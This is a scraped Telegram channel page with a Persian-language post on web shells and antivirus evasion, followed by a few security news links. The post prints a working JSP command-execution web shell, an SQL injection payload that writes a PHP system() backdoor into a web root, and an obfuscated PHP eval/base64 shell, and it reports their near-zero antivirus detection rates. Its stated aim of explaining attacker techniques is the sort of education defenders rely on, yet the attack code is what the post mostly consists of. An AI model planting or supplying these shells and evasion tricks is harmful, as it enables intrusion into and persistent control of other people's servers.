HackerOne – Telegram
HackerOne
11.1K subscribers
644 photos
31 videos
79 files
2.74K links
Community : @Sec0x01
@Bug0x
Download Telegram
وب‌شل‌ها ابزار مدیریت و Post Exploitation مهاجمین تحت وب است. آن‌ها می‌توانند با وب‌شل‌ بسیار سریعتر و بهینه‌تر به اجزای سرورها دسترسی داشته و عملیات خود را انجام دهند.
همانطور که می‌دانید وب‌شل‌ها تغییر چندانی در ماهیت خود از چند سال پیش نداشته‌اند، اما به مرور سیاست‌های جلوگیری از تشخیص در آن‌ها به‌کار گرفته شده است.

۱. استفاده از فناوری JSP در کنار استفاده از فناوری‌های Web2:
‍‍
<%@ page import="java.util.*,java.io.*"%>

<html>

  <body>

    <form method="GET" name="offsec.ir" action="">

      <input type="text" name="cmd">

      <input type="submit" value="Send">

    </form>

    <pre>

      <%

        if (request.getParameter("cmd") != null)

        {

          out.println("Command: " + request.getParameter("cmd") + "<br>");

          Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));

          OutputStream os = p.getOutputStream();

          InputStream in = p.getInputStream();

          DataInputStream dis = new DataInputStream(in);

          String disr = dis.readLine();

          while ( disr != null )

          {

            out.println(disr);

            disr = dis.readLine();

          }

        }

      %>

    </pre>

  </body>

</html>


که هم‌اکنون نیز مشاهده می‌کنید (goo.gl/PE6ZC0) میزان شناخت این وب‌شل توسط ضدویروس‌ها ۲ از ۵۴ بوده است.


۲. استفاده از توابع خطرناک در میانه‌ی کدها و عملیات روتین تحت وب:

UNION SELECT NULL,"<? system($_REQUEST['cmd']); ?>", NULL INTO OUTFILE "/var/www/offsec.ir/webshell.php" —


که بدیهی است یک دستور SQL به جهت جا انداختن یک پشت‌دری (Backdoor) درون یک فایل می‌باشد. البته برای این مورد مهاجم باید یک آسیب‌پذیری SQL Injection یافت کند.

میزان شناخت این مورد توسط ضدویروس‌ها، صفر از ۵۴ بوده است!

۳. یکی از مزایای مبهم‌سازی (Obfuscation) کدها برای حملات تحت وب، استفاده از الگوریتم‌ها و ترکیبات ناشناخته‌ی آن جهت مقابله با IDS/IPS ها، ضدویروس‌ها، Firewallها و دیگر ابزارهای شناخت وب‌شل‌ است. در این مورد قصد داریم یک الگوریتم ترکیبی را به شما نمایش دهیم تا درک کنید چقدر دورزدن ضدویروس‌ها می‌تواند آسان باشد:

<?php

/*

@offscmag – offsec.ir

Obfuscation provided by FOPO - Free Online PHP Obfuscator

Checksum: e5a931bb23bbcc2dbf286decc8e2b2b72a7d9b0b

*/ $g2a594c0="\x62\x61\163\145\66\64\137\144\145\143\157\144\145";@eval($g2a594c0( "Ly9Oc044UThBMCtXVVJ6NytPQ2VkU0lGeFczNEwrR1NZVlJnZHN5M1pKK01mSXRJUkRYeU1OOGR2RX


این قسمتی از یک وب‌شل مبهم‌سازی‌شده توسط ابزار رایگان و آنلاین FOPO می‌باشد که میزان شناخت آن توسط ضدویرس‌ها صفر از ۵۴ بوده است! (goo.gl/9JznXu)

ممکن است در نگاه اول کمی عجیب بوده باشد اما محتوای شفاف آن به شکل زیر است:

$g2a594c0=”base64_decode”;

@eval($g2a594c0(“…”);


تنها تفاوت آن با دیگر ابزارهای مبهم‌سازی این است که رشته‌ی “base64_decode” را چطور رمزگذاری (Encode)‌ می‌کند.
نمونه‌هایی از آن به این صورت است:

$ueafa759="\x62\141\163\x65\66\64\x5f\x64\x65\143\x6f\x64\145";

$c03a9f9c="\142\141\163\145\x36\64\x5f\x64\x65\x63\157\x64\x65";

$p44aaf5f="\x62\141\163\145\66\64\x5f\x64\145\143\x6f\x64\x65";


توجه می‌کنید که هر کدام از مقادیر یک ترکیب متفاوت از مقادیر Hex و Octal دیگری است! به همین سادگی.
در پست‌های آینده ان‌شاالله با روش‌های شناخت و جلوگیری بهینه و مدرن این سری از عملیات آشنا خواهید شد.
گروه پژوهشی آفسک
@offsecmag
Critical Flaw in PHPMailer, popular email sending PHP library, leaves Millions of Sites Vulnerable to Remote Exploit
http://thehackernews.com/2016/12/phpmailer-security.html
TR | Kriptografiye Giriş – 1
bit.ly/2htCoUv
https://media.ccc.de/v/33c3-7949-wheel_of_fortune
ارائه علی عباسی در کنفرانس CCC در رابطه با ضعف امنیتی سیستم‌های تعبیه شده در تولید اعداد تصادفی .
اوباما ۳۵ دیپلمات متهم به جاسوسی روسیه را از آمریکا اخراج کرد؛ سفارت روسیه در بریتانیا با جوجه اردک جواب داد!
بیشتر بخوانید:
http://bit.ly/2ikFEjE
— — —
🔐 @Bikhof: امنیت؛ در دنیای دیجیتال